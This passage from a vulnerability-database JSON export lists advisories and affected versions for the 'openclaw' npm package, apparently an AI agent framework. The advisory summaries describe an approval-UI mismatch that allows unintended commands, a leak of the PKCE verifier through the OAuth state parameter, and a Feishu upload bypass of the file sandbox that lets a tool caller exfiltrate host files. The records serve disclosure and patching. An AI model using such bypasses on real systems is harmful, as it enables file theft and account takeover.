text.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rw39-5899-8mxp","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rw39-5899-8mxp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32971","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32971"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-node-host-approval-ui-mismatch-allows-execution-of-unintended-commands","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_el
ements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-node-host-approval-ui-mismatch-allows-execution-of-unintended-commands"},{"reference_url":"https://github.com/advisories/GHSA-w8rf-7qf8-65ww","reference_id":"GHSA-w8rf-7qf8-65ww","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w8rf-7qf8-65ww"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability
":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability
":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability
":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability
":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability
":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability
":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-w8rf-7qf8-65ww"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qhr2-jktm-uycx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89434?format=json","vulnerability_id":"VCID-qjss-tvgk-3ubk","summary":"Duplicate Advisory: OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9jpj-g8vv-j5mf. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.4.2 reuses the PKCE verifier as the OAuth state parameter in the Gemini OAuth flow, exposing it through the redirect URL. 
Attackers who capture the redirect URL can obtain both the authorization code and PKCE verifier, defeating PKCE protection and enabling token redemption.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34511","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"
generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34511"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter"},{"reference_url":"https://github.com/advisories/GHSA-ch86-pxr9-j9h9","reference_id":"GHSA-ch86-pxr9-j9h9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ch86-pxr9-j9h9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"}
,{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"}
,{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["GHSA-ch86-pxr9-j9h9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qjss-tvgk-3ubk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91256?format=json","vulnerability_id":"VCID-qjvc-etb4-qbfv","summary":"OpenClaw: Feishu extension resolveUploadInput bypasses file-system sandbox and allows arbitrary file reads via upload_image\n## Summary\n\nFeishu upload path resolution could read files outside the configured localRoots sandbox before handing them to the upload path.\n\n## Impact\n\nA tool caller constrained to workspace or localRoots paths could exfiltrate arbitrary host files through Feishu upload actions.\n\n## Affected Component\n\n`extensions/feishu/src/docx.ts`\n\n## Fixed Versions\n\n- Affected: `>= 2026.2.6, <= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `764394c78b` (`fix: enforce localRoots sandbox on Feishu docx upload file 
